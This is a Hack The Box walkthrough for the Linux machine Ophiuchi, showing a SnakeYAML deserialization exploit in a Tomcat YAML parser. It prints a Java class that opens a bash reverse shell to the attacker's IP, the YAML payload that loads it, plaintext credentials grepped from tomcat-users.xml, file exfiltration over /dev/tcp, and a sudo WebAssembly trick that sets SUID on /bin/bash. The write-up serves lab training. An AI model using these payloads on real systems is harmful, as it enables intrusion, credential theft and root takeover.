Hack-The-Box-walkthrough[Ophiuchi]

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 13 Feb 2021
IP: 10.10.10.227

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.227
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Apache Tomcat 9.0.38
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

get user

on port 8080 we found Online YAML Parser

after google search, we found an exploit

  • yaml-payload

download the exploit, then modify src/artsploit/AwesomeScriptEngineFactory.java to the following content

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

public AwesomeScriptEngineFactory() {
String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.5/9001 0>&1"};
String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"};
try {
Runtime.getRuntime().exec(cmd);
Runtime.getRuntime().exec(jex);
Runtime.getRuntime().exec("echo $jex");
} catch (IOException e) {
e.printStackTrace();
}
}

@Override
public String getEngineName() {
return null;
}

@Override
public String getEngineVersion() {
return null;
}

@Override
public List<String> getExtensions() {
return null;
}

@Override
public List<String> getMimeTypes() {
return null;
}

@Override
public List<String> getNames() {
return null;
}

@Override
public String getLanguageName() {
return null;
}

@Override
public String getLanguageVersion() {
return null;
}

@Override
public Object getParameter(String key) {
return null;
}

@Override
public String getMethodCallSyntax(String obj, String m, String... args) {
return null;
}

@Override
public String getOutputStatement(String toDisplay) {
return null;
}

@Override
public String getProgram(String... statements) {
return null;
}

@Override
public ScriptEngine getScriptEngine() {
return null;
}
}

compile and serve:

1
2
3
javac src/artsploit/AwesomeScriptEngineFactory.java
cd src
python3 -m http.server 80

trigger exploit: browse to http://10.10.14.5:8080/ and enter:

1
2
3
4
5
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.5/"]
]]
]

privesc from tomcat to admin:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
┌──(root💀kali)-[~]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.227.
Ncat: Connection from 10.10.10.227:58294.
bash: cannot set terminal process group (815): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@ophiuchi:/$ id
whoid
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
tomcat@ophiuchi:/$ ami
whoami
tomcat
tomcat@ophiuchi:/$ cd ~
cd ~
tomcat@ophiuchi:~$ ls
ls
bin
BUILDING.txt
conf
CONTRIBUTING.md
lib
LICENSE
logs
NOTICE
README.md
RELEASE-NOTES
RUNNING.txt
temp
webapps
work
tomcat@ophiuchi:~$ cd conf
cd conf
tomcat@ophiuchi:~/conf$ ls
ls
catalina.policy
catalina.properties
context.xml
jaspic-providers.xml
jaspic-providers.xsd
logging.properties
server.xml
tomcat-users.xml
tomcat-users.xsd
web.xml
tomcat@ophiuchi:~/conf$ cat * | grep pass
cat * | grep pass
# passed to checkPackageAccess unless the
# passed to checkPackageDefinition unless the
analyzes the HTTP headers included with the request, and passes them
<!-- Use the LockOutRealm to prevent attempts to guess user passwords
<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
you must define such a user - the username and password are arbitrary. It is
them. You will also need to set the passwords to something appropriate.
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
<xs:attribute name="password" type="xs:string" />
<!-- pass the result to this style sheet residing -->
<!-- pass the result to this style sheet which is -->
<!-- work-around various issues when Java passes -->
<!-- headers passed to the CGI process as -->
<!-- passShellEnvironment Should the shell environment variables (if -->
<!-- any) be passed to the CGI script? [false] -->
<mime-type>application/vnd.blueice.multipass</mime-type>
tomcat@ophiuchi:~/conf$ su admin
su admin
Password: whythereisalimit
id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
whoami
admin
python -c 'import pty; pty.spawn("/bin/bash")'
bash: line 3: python: command not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
admin@ophiuchi:/opt/tomcat/conf$ id
id
uid=1000(admin) gid=1000(admin) groups=1000(admin)

then got the user flag

1
2
3
4
5
6
7
8
admin@ophiuchi:/opt/tomcat/conf$ cd
cd
admin@ophiuchi:~$ ls
ls
user.txt
admin@ophiuchi:~$ cat user.txt
cat user.txt
4985ea2805b1c7ee8adca11a4f0b0b39

get root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# ssh admin@10.10.10.227
The authenticity of host '10.10.10.227 (10.10.10.227)' can't be established.
ECDSA key fingerprint is SHA256:OmZ+JsRqDVNaBWMshp7wogZM0KhSKkp1YmaILhRxSY0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.227' (ECDSA) to the list of known hosts.
admin@10.10.10.227's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-51-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 14 Feb 2021 08:42:54 AM UTC

System load: 0.0
Usage of /: 20.4% of 27.43GB
Memory usage: 18%
Swap usage: 0%
Processes: 219
Users logged in: 0
IPv4 address for ens160: 10.10.10.227
IPv6 address for ens160: dead:beef::250:56ff:feb9:1c49


176 updates can be installed immediately.
56 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Feb 13 19:55:31 2021 from 10.10.14.17
admin@ophiuchi:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
(ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

download main.wasm:

  1. start listener on your machine
1
2
3
4
5
6
7
┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# nc -lvnp 9002 > main.wasm
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.227.
Ncat: Connection from 10.10.10.227:55062.
  1. send file
1
admin@ophiuchi:~$ cat /opt/wasm-functions/main.wasm > /dev/tcp/10.10.14.5/9002

analyze file:

  1. upload at https://webassembly.github.io/wabt/demo/wasm2wat/index.html

  2. edit the 0 to a 1 and copy the code:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    (module
    (type $t0 (func (result i32)))
    (func $info (export "info") (type $t0) (result i32)
    (i32.const 1))
    (table $T0 1 1 funcref)
    (memory $memory (export "memory") 16)
    (global $g0 (mut i32) (i32.const 1048576))
    (global $__data_end (export "__data_end") i32 (i32.const 1048576))
    (global $__heap_base (export "__heap_base") i32 (i32.const 1048576)))
  3. paste the code at https://webassembly.github.io/wabt/demo/wat2wasm/index.html

  4. click on download

  5. transfer the downloaded file to target to a writeable directory

  6. create deploy.sh and run sudo command:

1
2
3
4
┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.227 - - [14/Feb/2021 04:02:19] "GET /test.wasm HTTP/1.1" 200 -
1
2
3
4
5
6
cd /tmp
echo "chmod +s /bin/bash" > deploy.sh
wget http://10.10.14.5/test.wasm main.wasm
chmod 777 *
sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
/bin/bash -p

and now we are root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
admin@ophiuchi:/tmp$ ls
deploy.sh systemd-private-64051d8f15f4418cbb11018667bc15ad-systemd-logind.service-Y5t4mf vmware-root_667-3980363901
hsperfdata_tomcat systemd-private-64051d8f15f4418cbb11018667bc15ad-systemd-resolved.service-lBxjmi wasm-functions
main.wasm systemd-private-64051d8f15f4418cbb11018667bc15ad-systemd-timesyncd.service-RVvCVh
admin@ophiuchi:/tmp$ sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy

admin@ophiuchi:/tmp$ /bin/bash -p
bash-5.0# id
uid=1000(admin) gid=1000(admin) euid=0(root) egid=0(root) groups=0(root),1000(admin)
bash-5.0# whoami
root
bash-5.0# cd
bash-5.0# ls
user.txt
bash-5.0# cd /root
bash-5.0# ls
go root.txt snap
bash-5.0# cat root.txt
5296450d942ebf2bd9763b2431f7f1d5

Summary of knowledge

  • modify yaml-payload to get a reverse shell
  • tomcat password leak
  • .wasm file analyse and modify
  • privesc through NOPASSWD /usr/bin/go

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…